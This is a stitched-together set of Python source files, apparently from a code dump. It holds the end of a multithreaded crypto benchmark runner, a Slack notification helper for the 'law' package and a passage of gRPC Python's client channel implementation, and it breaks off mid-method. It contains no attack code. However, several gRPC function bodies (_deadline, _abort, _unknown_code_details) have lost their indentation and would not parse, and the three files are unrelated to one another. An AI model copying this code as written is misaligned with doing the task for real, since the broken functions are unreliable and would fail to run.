                                   quick_test=quick_test, smoke_test=smoke_test, imix=imix,
                                   aad_size=aad_size, job_iter=job_iter))
                TOTAL_VARIANTS += 1

        if 'aead-only' in alg_types:
            for direction in directions:
                for aead_alg in aead_algos:
                    TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
                                       offset=offset, sizes=sizes, aead_alg=aead_alg,
                                       cold_cache=cold_cache, shani_off=shani_off,
                                       gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
                                       quick_test=quick_test, smoke_test=smoke_test, imix=imix,
                                       aad_size=aad_size, job_iter=job_iter))
                    TOTAL_VARIANTS += 1

        if 'cipher-hash-all' in alg_types:
            for direction in directions:
                # all cipher + hash combinations
                for cipher_alg in cipher_algos:
                    for hash_alg in hash_algos:
                        TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
                                           offset=offset, sizes=sizes, cipher_alg=cipher_alg,
                                           hash_alg=hash_alg, cold_cache=cold_cache,
                                           shani_off=shani_off, gcm_job_api=gcm_job_api,
                                           unhalted_cycles=unhalted_cycles, quick_test=quick_test,
                                           smoke_test=smoke_test, imix=imix, aad_size=aad_size,
                                           job_iter=job_iter))
                        TOTAL_VARIANTS += 1

    # take starting timestamp
    start_ts = time.time()

    # If cores selected start a new thread on each core
    # otherwise start single thread without specifying a core
    #
    # Each thread takes a variant from the todo queue
    # and places it in the done queue when complete
    if cores is None:
        threading.Thread(target=run_test).start()
    else:
        for core in cores:
            threading.Thread(target=run_test, args=(core,)).start()

    # wait for all threads to complete
    # (the threads are not joined directly; TODO_Q.join() is the barrier)
    TODO_Q.join()

    # take end timestamp
    end_ts = time.time()

    # exit if error encountered
    if EXIT_ERROR is True:
        print('Error encountered while running tests!', file=sys.stderr)
        sys.exit(1)

    # output time taken to complete
    runtime = end_ts - start_ts
    if QUIET is False:
        print("Time to complete: {:.3f} seconds" \
              .format(runtime), file=sys.stderr)

    # transfer completed runs from the
    # done queue to the results list
    while DONE_Q.empty() is False:
        variant = DONE_Q.get()
        result.append(variant)

    # sort by idx
    result.sort(key=lambda x: x.get_idx())

    # parse results and print to stdout
    output = parse_results(result)
    for line in output:
        print(line)


if __name__ == "__main__":
    main()
|
notification.py
|
# -*- coding: utf-8 -*-
"""
Slack notifications.
"""
import threading
import logging
from law.config import Config
logger = logging.getLogger(__name__)
def notify_slack(title, content, attachment_color="#4bb543", attachment_fallback=None,
        short_threshold=40, token=None, channel=None, **kwargs):
    """Send a slack notification and return True on success.

    *title* becomes the message text and *content* (a dict) is rendered as
    attachment fields. *token* and *channel* default to the values in the
    law config. Delivery happens in a background thread, so a True return
    only means the notification was dispatched, not that it arrived.
    """
    # test import
    import slackclient  # noqa: F401

    cfg = Config.instance()

    # get default token and channel from the config when not given
    if not token:
        token = cfg.get_expanded("notifications", "slack_token")
    if not channel:
        channel = cfg.get_expanded("notifications", "slack_channel")

    if not token or not channel:
        logger.warning("cannot send slack notification, token ({}) or channel ({}) empty".format(
            token, channel))
        return False

    request = {
        "channel": channel,
        "text": title,
        "attachments": {
            "color": attachment_color,
            "fields": [],
            # always initialize the fallback: the loop below appends to it,
            # and the original raised a KeyError here whenever
            # attachment_fallback was empty
            "fallback": attachment_fallback or "",
        },
        "as_user": True,
        "parse": "full",
    }

    for key, value in content.items():
        request["attachments"]["fields"].append({
            "title": key,
            # str() so non-string values do not break the length check
            "value": value,
            "short": len(str(value)) <= short_threshold,
        })
        request["attachments"]["fallback"] += "_{}_: {}\n\n".format(key, value)

    thread = threading.Thread(target=_notify_slack, args=(token, request))
    thread.start()

    return True
def _notify_slack(token, request):
    """Worker performing the actual Slack API call (runs in a thread)."""
    import os
    import json
    import traceback

    import six
    import slackclient

    try:
        # the token may also be given as a path to a file containing it
        if os.path.isfile(token):
            with open(token, "r") as f:
                token = f.read().strip()

        # the Slack API expects attachments as a JSON encoded list
        if not isinstance(request["attachments"], six.string_types):
            request["attachments"] = json.dumps([request["attachments"]])

        client = slackclient.SlackClient(token)
        response = client.api_call("chat.postMessage", **request)
        if not response["ok"]:
            logger.warning("unsuccessful Slack API call: {}".format(response))
    except Exception as e:
        t = traceback.format_exc()
        logger.warning("could not send Slack notification: {}\n{}".format(e, t))
|
_channel.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import copy
import functools
import logging
import os
import sys
import threading
import time
import grpc
import grpc.experimental
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)

_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)

_EMPTY_FLAGS = 0

# NOTE(rbellevi): No guarantees are given about the maintenance of this
# environment variable.
_DEFAULT_SINGLE_THREADED_UNARY_STREAM = os.getenv(
    "GRPC_SINGLE_THREADED_UNARY_STREAM") is not None

# Operations initially outstanding ("due") for each RPC arity; an RPC is
# complete once all of its due operations have been observed on the
# completion queue.
_UNARY_UNARY_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.send_message,
    cygrpc.OperationType.send_close_from_client,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_message,
    cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.send_message,
    cygrpc.OperationType.send_close_from_client,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_message,
    cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_status_on_client,
)

_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
    'Exception calling channel subscription callback!')

# repr() templates for terminated RPCs, with and without debug details.
_OK_RENDEZVOUS_REPR_FORMAT = ('<{} of RPC that terminated with:\n'
                              '\tstatus = {}\n'
                              '\tdetails = "{}"\n'
                              '>')

_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<{} of RPC that terminated with:\n'
                                  '\tstatus = {}\n'
                                  '\tdetails = "{}"\n'
                                  '\tdebug_error_string = "{}"\n'
                                  '>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
class _RPCState(object):
    """Mutable client-side state of a single RPC, guarded by ``condition``."""

    def __init__(self, due, initial_metadata, trailing_metadata, code, details):
        # Guards every other attribute; reads/writes happen while holding it.
        self.condition = threading.Condition()
        # The cygrpc.OperationType objects representing events due from the RPC's
        # completion queue.
        self.due = set(due)
        self.initial_metadata = initial_metadata
        self.response = None
        self.trailing_metadata = trailing_metadata
        self.code = code
        self.details = details
        self.debug_error_string = None
        # The semantics of grpc.Future.cancel and grpc.Future.cancelled are
        # slightly wonky, so they have to be tracked separately from the rest of the
        # result of the RPC. This field tracks whether cancellation was requested
        # prior to termination of the RPC.
        self.cancelled = False
        self.callbacks = []
        # Fork epoch at creation time; used to detect state from before a fork.
        self.fork_epoch = cygrpc.get_fork_epoch()

    def reset_postfork_child(self):
        # Re-create the condition in the child: the parent's lock may be held
        # by a thread that does not exist after fork.
        self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
    """Apply a completion-queue *event* to *state*.

    Removes the completed operations from ``state.due``, stores any received
    metadata / response / status on *state*, and returns the callbacks that
    became runnable (the caller must invoke them outside the lock).
    Must be called while holding ``state.condition``.
    """
    callbacks = []
    for batch_operation in event.batch_operations:
        operation_type = batch_operation.type()
        state.due.remove(operation_type)
        if operation_type == cygrpc.OperationType.receive_initial_metadata:
            state.initial_metadata = batch_operation.initial_metadata()
        elif operation_type == cygrpc.OperationType.receive_message:
            serialized_response = batch_operation.message()
            if serialized_response is not None:
                response = _common.deserialize(serialized_response,
                                               response_deserializer)
                if response is None:
                    details = 'Exception deserializing response!'
                    _abort(state, grpc.StatusCode.INTERNAL, details)
                else:
                    state.response = response
        elif operation_type == cygrpc.OperationType.receive_status_on_client:
            state.trailing_metadata = batch_operation.trailing_metadata()
            if state.code is None:
                code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
                    batch_operation.code())
                if code is None:
                    state.code = grpc.StatusCode.UNKNOWN
                    # Report the raw cygrpc code: the mapped `code` is always
                    # None on this branch, which made the message useless.
                    state.details = _unknown_code_details(
                        batch_operation.code(), batch_operation.details())
                else:
                    state.code = code
                    state.details = batch_operation.details()
                    state.debug_error_string = batch_operation.error_string()
            callbacks.extend(state.callbacks)
            state.callbacks = None
    return callbacks
def _event_handler(state, response_deserializer):
    """Create the completion-queue callback that drives *state*.

    The returned function applies one event to *state*, wakes waiters, runs
    any due user callbacks, and returns True when the RPC is finished (so
    the channel spin thread can stop tracking it).
    """

    def handle_event(event):
        with state.condition:
            callbacks = _handle_event(event, state, response_deserializer)
            state.condition.notify_all()
            done = not state.due
        for callback in callbacks:
            try:
                callback()
            except Exception as e:  # pylint: disable=broad-except
                # NOTE(rbellevi): We suppress but log errors here so as not to
                # kill the channel spin thread.
                # Not every callback is a functools.partial, so fall back to
                # the callback itself instead of raising AttributeError on
                # `.func` inside the very handler meant to suppress errors.
                _LOGGER.error('Exception in callback %s: %s',
                              repr(getattr(callback, 'func', callback)),
                              repr(e))
        # After a fork, more events may still arrive for this state; only
        # report done when no fork happened since the state was created.
        return done and state.fork_epoch >= cygrpc.get_fork_epoch()

    return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
                              event_handler):
    """Consume a request iterator supplied by the user.

    Spawns a fork-managed daemon thread that serializes each request and
    sends it on *call*, aborting the RPC on iteration or serialization
    failures and sending close-from-client once the iterator is exhausted.
    """

    def consume_request_iterator():  # pylint: disable=too-many-branches
        # Iterate over the request iterator until it is exhausted or an error
        # condition is encountered.
        while True:
            return_from_user_request_generator_invoked = False
            try:
                # The thread may die in user-code. Do not block fork for this.
                cygrpc.enter_user_request_generator()
                request = next(request_iterator)
            except StopIteration:
                break
            except Exception:  # pylint: disable=broad-except
                cygrpc.return_from_user_request_generator()
                return_from_user_request_generator_invoked = True
                code = grpc.StatusCode.UNKNOWN
                details = 'Exception iterating requests!'
                _LOGGER.exception(details)
                call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
                            details)
                _abort(state, code, details)
                return
            finally:
                # Guard against invoking the cygrpc exit hook twice when the
                # broad except above already did so.
                if not return_from_user_request_generator_invoked:
                    cygrpc.return_from_user_request_generator()
            serialized_request = _common.serialize(request, request_serializer)
            with state.condition:
                if state.code is None and not state.cancelled:
                    if serialized_request is None:
                        code = grpc.StatusCode.INTERNAL
                        details = 'Exception serializing request!'
                        call.cancel(
                            _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
                            details)
                        _abort(state, code, details)
                        return
                    else:
                        operations = (cygrpc.SendMessageOperation(
                            serialized_request, _EMPTY_FLAGS),)
                        operating = call.operate(operations, event_handler)
                        if operating:
                            state.due.add(cygrpc.OperationType.send_message)
                        else:
                            return

                        # True once the previous send completed (or the RPC
                        # terminated) - only then may the next request be sent.
                        def _done():
                            return (state.code is not None or
                                    cygrpc.OperationType.send_message not in
                                    state.due)

                        _common.wait(state.condition.wait,
                                     _done,
                                     spin_cb=functools.partial(
                                         cygrpc.block_if_fork_in_progress,
                                         state))
                        if state.code is not None:
                            return
                else:
                    return
        with state.condition:
            if state.code is None:
                operations = (
                    cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
                operating = call.operate(operations, event_handler)
                if operating:
                    state.due.add(cygrpc.OperationType.send_close_from_client)

    consumption_thread = cygrpc.ForkManagedThread(
        target=consume_request_iterator)
    # Daemonize so a stuck user iterator cannot prevent interpreter exit.
    # NOTE(review): Thread.setDaemon is deprecated in favor of the .daemon
    # attribute - confirm ForkManagedThread exposes it before switching.
    consumption_thread.setDaemon(True)
    consumption_thread.start()
def _rpc_state_string(class_name, rpc_state):
    """Render a human-readable description of an RPC's current state.

    Args:
      class_name: Name of the rendezvous/error class being rendered.
      rpc_state: The _RPCState to describe; read under its condition lock.

    Returns:
      A short string for in-progress RPCs, or a formatted summary including
      code, details, and (for failures) the debug error string.
    """
    with rpc_state.condition:
        code = rpc_state.code
        if code is None:
            # RPC still in flight: no terminal status to report yet.
            return '<{} object>'.format(class_name)
        if code is grpc.StatusCode.OK:
            return _OK_RENDEZVOUS_REPR_FORMAT.format(class_name, code,
                                                     rpc_state.details)
        return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(class_name, code,
                                                     rpc_state.details,
                                                     rpc_state.debug_error_string)
class _InactiveRpcError(grpc.RpcError, grpc.Call, grpc.Future):
    """An RPC error not tied to the execution of a particular RPC.

    Holds a frozen snapshot of a terminal RPC state; the RPC represented by
    the state object must not be in-progress or cancelled.

    Attributes:
      _state: An instance of _RPCState.
    """

    def __init__(self, state):
        # Deep-copy the terminal state under its lock so this error object is
        # immutable and safe to share after construction.
        with state.condition:
            snapshot = _RPCState((), copy.deepcopy(state.initial_metadata),
                                 copy.deepcopy(state.trailing_metadata),
                                 state.code, copy.deepcopy(state.details))
            snapshot.response = copy.copy(state.response)
            snapshot.debug_error_string = copy.copy(state.debug_error_string)
            self._state = snapshot

    def initial_metadata(self):
        """See grpc.Call.initial_metadata."""
        return self._state.initial_metadata

    def trailing_metadata(self):
        """See grpc.Call.trailing_metadata."""
        return self._state.trailing_metadata

    def code(self):
        """See grpc.Call.code."""
        return self._state.code

    def details(self):
        """See grpc.Call.details."""
        return _common.decode(self._state.details)

    def debug_error_string(self):
        """See grpc.Call.debug_error_string."""
        return _common.decode(self._state.debug_error_string)

    def _repr(self):
        return _rpc_state_string(self.__class__.__name__, self._state)

    def __repr__(self):
        return self._repr()

    def __str__(self):
        return self._repr()

    def cancel(self):
        """See grpc.Future.cancel."""
        # The RPC is already terminated; cancellation is never possible.
        return False

    def cancelled(self):
        """See grpc.Future.cancelled."""
        return False

    def running(self):
        """See grpc.Future.running."""
        return False

    def done(self):
        """See grpc.Future.done."""
        # Always terminal by construction.
        return True

    def result(self, timeout=None):  # pylint: disable=unused-argument
        """See grpc.Future.result."""
        raise self

    def exception(self, timeout=None):  # pylint: disable=unused-argument
        """See grpc.Future.exception."""
        return self

    def traceback(self, timeout=None):  # pylint: disable=unused-argument
        """See grpc.Future.traceback."""
        try:
            raise self
        except grpc.RpcError:
            return sys.exc_info()[2]

    def add_done_callback(self, fn, timeout=None):  # pylint: disable=unused-argument
        """See grpc.Future.add_done_callback."""
        # Already done: invoke the callback immediately.
        fn(self)
class _Rendezvous(grpc.RpcError, grpc.RpcContext):
    """An RPC iterator.

    Base class for the single- and multi-threaded rendezvous variants; it
    implements the grpc.RpcContext surface and the iterator protocol shell,
    leaving _next() to subclasses.

    Attributes:
      _state: An instance of _RPCState.
      _call: An instance of SegregatedCall or IntegratedCall.
        In either case, the _call object is expected to have operate, cancel,
        and next_event methods.
      _response_deserializer: A callable taking bytes and return a Python
        object.
      _deadline: A float representing the deadline of the RPC in seconds. Or
        possibly None, to represent an RPC with no deadline at all.
    """

    def __init__(self, state, call, response_deserializer, deadline):
        super(_Rendezvous, self).__init__()
        self._state = state
        self._call = call
        self._response_deserializer = response_deserializer
        self._deadline = deadline

    def is_active(self):
        """See grpc.RpcContext.is_active"""
        with self._state.condition:
            # No terminal status code yet means the RPC is still running.
            return self._state.code is None

    def time_remaining(self):
        """See grpc.RpcContext.time_remaining"""
        with self._state.condition:
            if self._deadline is None:
                return None
            else:
                # Clamp at zero so an expired deadline never reads negative.
                return max(self._deadline - time.time(), 0)

    def cancel(self):
        """See grpc.RpcContext.cancel"""
        with self._state.condition:
            if self._state.code is None:
                code = grpc.StatusCode.CANCELLED
                details = 'Locally cancelled by application!'
                self._call.cancel(
                    _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
                self._state.cancelled = True
                _abort(self._state, code, details)
                # Wake any threads blocked waiting on this RPC's state.
                self._state.condition.notify_all()
                return True
            else:
                # Already terminated; nothing to cancel.
                return False

    def add_callback(self, callback):
        """See grpc.RpcContext.add_callback"""
        with self._state.condition:
            # callbacks is None once the RPC has terminated and the stored
            # callbacks have been drained.
            if self._state.callbacks is None:
                return False
            else:
                self._state.callbacks.append(callback)
                return True

    def __iter__(self):
        return self

    def next(self):
        # Python 2 iterator protocol alias.
        return self._next()

    def __next__(self):
        return self._next()

    def _next(self):
        # Subclasses implement response retrieval.
        raise NotImplementedError()

    def debug_error_string(self):
        raise NotImplementedError()

    def _repr(self):
        return _rpc_state_string(self.__class__.__name__, self._state)

    def __repr__(self):
        return self._repr()

    def __str__(self):
        return self._repr()

    def __del__(self):
        # Cancel the RPC if the rendezvous is garbage collected while the
        # call is still in flight, so server-side work can stop promptly.
        with self._state.condition:
            if self._state.code is None:
                self._state.code = grpc.StatusCode.CANCELLED
                self._state.details = 'Cancelled upon garbage collection!'
                self._state.cancelled = True
                self._call.cancel(
                    _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
                    self._state.details)
                self._state.condition.notify_all()
class _SingleThreadedRendezvous(_Rendezvous, grpc.Call):  # pylint: disable=too-many-ancestors
    """An RPC iterator operating entirely on a single thread.

    The __next__ method of _SingleThreadedRendezvous does not depend on the
    existence of any other thread, including the "channel spin thread".
    However, this means that its interface is entirely synchronous. So this
    class cannot fulfill the grpc.Future interface.
    """

    def initial_metadata(self):
        """See grpc.Call.initial_metadata"""
        with self._state.condition:
            # NOTE(gnossen): Based on our initial call batch, we are guaranteed
            # to receive initial metadata before any messages.
            while self._state.initial_metadata is None:
                self._consume_next_event()
            return self._state.initial_metadata

    def trailing_metadata(self):
        """See grpc.Call.trailing_metadata"""
        with self._state.condition:
            if self._state.trailing_metadata is None:
                raise grpc.experimental.UsageError(
                    "Cannot get trailing metadata until RPC is completed.")
            return self._state.trailing_metadata

    def code(self):
        """See grpc.Call.code"""
        with self._state.condition:
            if self._state.code is None:
                raise grpc.experimental.UsageError(
                    "Cannot get code until RPC is completed.")
            return self._state.code

    def details(self):
        """See grpc.Call.details"""
        with self._state.condition:
            if self._state.details is None:
                raise grpc.experimental.UsageError(
                    "Cannot get details until RPC is completed.")
            return _common.decode(self._state.details)

    def _consume_next_event(self):
        # Blocks on the call's completion queue; must be the only event
        # consumer for this call (single-threaded by design).
        event = self._call.next_event()
        with self._state.condition:
            callbacks = _handle_event(event, self._state,
                                      self._response_deserializer)
            for callback in callbacks:
                # NOTE(gnossen): We intentionally allow exceptions to bubble up
                # to the user when running on a single thread.
                callback()
        return event

    def _next_response(self):
        # Drain events until a response arrives or the RPC terminates.
        while True:
            self._consume_next_event()
            with self._state.condition:
                if self._state.response is not None:
                    response = self._state.response
                    self._state.response = None
                    return response
                elif cygrpc.OperationType.receive_message not in self._state.due:
                    # No receive outstanding: the stream has ended.
                    if self._state.code is grpc.StatusCode.OK:
                        raise StopIteration()
                    elif self._state.code is not None:
                        raise self

    def _next(self):
        # Kick off a receive_message operation, then synchronously wait for
        # its result via _next_response().
        with self._state.condition:
            if self._state.code is None:
                operating = self._call.operate(
                    (cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),), None)
                if operating:
                    self._state.due.add(cygrpc.OperationType.receive_message)
            elif self._state.code is grpc.StatusCode.OK:
                raise StopIteration()
            else:
                raise self
        return self._next_response()

    def debug_error_string(self):
        with self._state.condition:
            if self._state.debug_error_string is None:
                raise grpc.experimental.UsageError(
                    "Cannot get debug error string until RPC is completed.")
            return _common.decode(self._state.debug_error_string)
class _MultiThreadedRendezvous(_Rendezvous, grpc.Call, grpc.Future):  # pylint: disable=too-many-ancestors
    """An RPC iterator that depends on a channel spin thread.

    This iterator relies upon a per-channel thread running in the background,
    dequeueing events from the completion queue, and notifying threads waiting
    on the threading.Condition object in the _RPCState object.

    This extra thread allows _MultiThreadedRendezvous to fulfill the grpc.Future interface
    and to mediate a bidirection streaming RPC.
    """

    def initial_metadata(self):
        """See grpc.Call.initial_metadata"""
        with self._state.condition:

            def _done():
                return self._state.initial_metadata is not None

            # Block until the spin thread records initial metadata.
            _common.wait(self._state.condition.wait, _done)
            return self._state.initial_metadata

    def trailing_metadata(self):
        """See grpc.Call.trailing_metadata"""
        with self._state.condition:

            def _done():
                return self._state.trailing_metadata is not None

            _common.wait(self._state.condition.wait, _done)
            return self._state.trailing_metadata

    def code(self):
        """See grpc.Call.code"""
        with self._state.condition:

            def _done():
                return self._state.code is not None

            _common.wait(self._state.condition.wait, _done)
            return self._state.code

    def details(self):
        """See grpc.Call.details"""
        with self._state.condition:

            def _done():
                return self._state.details is not None

            _common.wait(self._state.condition.wait, _done)
            return _common.decode(self._state.details)

    def debug_error_string(self):
        with self._state.condition:

            def _done():
                return self._state.debug_error_string is not None

            _common.wait(self._state.condition.wait, _done)
            return _common.decode(self._state.debug_error_string)

    def cancelled(self):
        """See grpc.Future.cancelled."""
        with self._state.condition:
            return self._state.cancelled

    def running(self):
        """See grpc.Future.running."""
        with self._state.condition:
            return self._state.code is None

    def done(self):
        """See grpc.Future.done."""
        with self._state.condition:
            return self._state.code is not None

    def _is_complete(self):
        # Caller must hold self._state.condition.
        return self._state.code is not None

    def result(self, timeout=None):
        """Returns the result of the computation or raises its exception.

        See grpc.Future.result for the full API contract.
        """
        with self._state.condition:
            timed_out = _common.wait(self._state.condition.wait,
                                     self._is_complete,
                                     timeout=timeout)
            if timed_out:
                raise grpc.FutureTimeoutError()
            else:
                if self._state.code is grpc.StatusCode.OK:
                    return self._state.response
                elif self._state.cancelled:
                    raise grpc.FutureCancelledError()
                else:
                    raise self

    def exception(self, timeout=None):
        """Return the exception raised by the computation.

        See grpc.Future.exception for the full API contract.
        """
        with self._state.condition:
            timed_out = _common.wait(self._state.condition.wait,
                                     self._is_complete,
                                     timeout=timeout)
            if timed_out:
                raise grpc.FutureTimeoutError()
            else:
                if self._state.code is grpc.StatusCode.OK:
                    # Success: no exception to report.
                    return None
                elif self._state.cancelled:
                    raise grpc.FutureCancelledError()
                else:
                    return self

    def traceback(self, timeout=None):
        """Access the traceback of the exception raised by the computation.

        See grpc.future.traceback for the full API contract.
        """
        with self._state.condition:
            timed_out = _common.wait(self._state.condition.wait,
                                     self._is_complete,
                                     timeout=timeout)
            if timed_out:
                raise grpc.FutureTimeoutError()
            else:
                if self._state.code is grpc.StatusCode.OK:
                    return None
                elif self._state.cancelled:
                    raise grpc.FutureCancelledError()
                else:
                    # Materialize a traceback by raising and catching self.
                    try:
                        raise self
                    except grpc.RpcError:
                        return sys.exc_info()[2]

    def add_done_callback(self, fn):
        """See grpc.Future.add_done_callback."""
        with self._state.condition:
            if self._state.code is None:
                # Still running: defer until the spin thread drains callbacks.
                self._state.callbacks.append(functools.partial(fn, self))
                return

        # Already terminated: invoke immediately, outside the lock.
        fn(self)

    def _next(self):
        # Issue a receive_message operation and wait for the spin thread to
        # deliver either a response or the terminal status.
        with self._state.condition:
            if self._state.code is None:
                event_handler = _event_handler(self._state,
                                               self._response_deserializer)
                operating = self._call.operate(
                    (cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
                    event_handler)
                if operating:
                    self._state.due.add(cygrpc.OperationType.receive_message)
            elif self._state.code is grpc.StatusCode.OK:
                raise StopIteration()
            else:
                raise self

            def _response_ready():
                return (
                    self._state.response is not None or
                    (cygrpc.OperationType.receive_message not in self._state.due
                     and self._state.code is not None))

            _common.wait(self._state.condition.wait, _response_ready)
            if self._state.response is not None:
                response = self._state.response
                self._state.response = None
                return response
            elif cygrpc.OperationType.receive_message not in self._state.due:
                if self._state.code is grpc.StatusCode.OK:
                    raise StopIteration()
                elif self._state.code is not None:
                    raise self
def _start_unary_request(request, timeout, request_serializer):
    """Serialize a unary request and compute its deadline.

    Args:
      request: The request message supplied by the user.
      timeout: Optional timeout in seconds, or None.
      request_serializer: Callable serializing the request, or None.

    Returns:
      A (deadline, serialized_request, error) triple.  On success, error is
      None; on serialization failure, serialized_request is None and error
      is an _InactiveRpcError describing the INTERNAL failure.
    """
    deadline = _deadline(timeout)
    serialized_request = _common.serialize(request, request_serializer)
    if serialized_request is not None:
        return deadline, serialized_request, None
    failure_state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
                              'Exception serializing request!')
    return deadline, None, _InactiveRpcError(failure_state)
def _end_unary_response_blocking(state, call, with_call, deadline):
    """Produce the final result of a blocking unary-response RPC.

    Raises an _InactiveRpcError on any non-OK status; otherwise returns the
    response, optionally paired with a rendezvous exposing call details.
    """
    if state.code is not grpc.StatusCode.OK:
        raise _InactiveRpcError(state)
    if not with_call:
        return state.response
    rendezvous = _MultiThreadedRendezvous(state, call, None, deadline)
    return state.response, rendezvous
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
    """Build the two operation batches for a stream-unary invocation.

    The first batch sends initial metadata and receives the single response
    message plus the final status; the second receives initial metadata.
    """
    primary_batch = (
        cygrpc.SendInitialMetadataOperation(metadata, initial_metadata_flags),
        cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
        cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
    )
    metadata_batch = (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),)
    return (primary_batch, metadata_batch)
def _stream_unary_invocation_operationses_and_tags(metadata,
                                                   initial_metadata_flags):
    """Pair each stream-unary operation batch with a None tag.

    Used for segregated calls, whose events are matched by batch rather
    than by an explicit tag object.
    """
    operationses = _stream_unary_invocation_operationses(
        metadata, initial_metadata_flags)
    return tuple((operations, None) for operations in operationses)
def _determine_deadline(user_deadline):
    """Combine the propagated (parent) deadline with the user's deadline.

    Returns whichever deadline is set, the stricter (smaller) of the two
    when both are set, or None when neither is set.
    """
    parent_deadline = cygrpc.get_deadline_from_context()
    if parent_deadline is None:
        # Covers both "only user deadline" and "no deadline at all".
        return user_deadline
    if user_deadline is None:
        return parent_deadline
    return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
    """Invocation-side implementation of a unary-request/unary-response RPC."""

    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        # channel: the underlying cygrpc.Channel.
        # managed_call: factory for integrated calls serviced by the channel
        #   spin thread (used by future()); blocking paths use segregated
        #   calls driven by the invoking thread instead.
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
        # Serialize the request and assemble the full unary-unary operation
        # batch.  Returns (state, operations, deadline, error); state is None
        # exactly when serialization failed, with error holding the
        # _InactiveRpcError to raise.
        deadline, serialized_request, rendezvous = _start_unary_request(
            request, timeout, self._request_serializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        if serialized_request is None:
            return None, None, None, rendezvous
        else:
            state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
            operations = (
                cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                    initial_metadata_flags),
                cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
                cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
            )
            return state, operations, deadline, None

    def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
                  compression):
        # Run the entire RPC synchronously on the calling thread using a
        # segregated call (no channel spin thread involvement).
        state, operations, deadline, rendezvous = self._prepare(
            request, timeout, metadata, wait_for_ready, compression)
        if state is None:
            raise rendezvous  # pylint: disable-msg=raising-bad-type
        else:
            call = self._channel.segregated_call(
                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, _determine_deadline(deadline), metadata,
                None if credentials is None else credentials._credentials, ((
                    operations,
                    None,
                ),), self._context)
            # One event covers the single combined batch of operations.
            event = call.next_event()
            _handle_event(event, state, self._response_deserializer)
            return state, call

    def __call__(self,
                 request,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        """See grpc.UnaryUnaryMultiCallable.__call__: blocking invocation."""
        state, call, = self._blocking(request, timeout, metadata, credentials,
                                      wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, False, None)

    def with_call(self,
                  request,
                  timeout=None,
                  metadata=None,
                  credentials=None,
                  wait_for_ready=None,
                  compression=None):
        """See grpc.UnaryUnaryMultiCallable.with_call: response plus call."""
        state, call, = self._blocking(request, timeout, metadata, credentials,
                                      wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, True, None)

    def future(self,
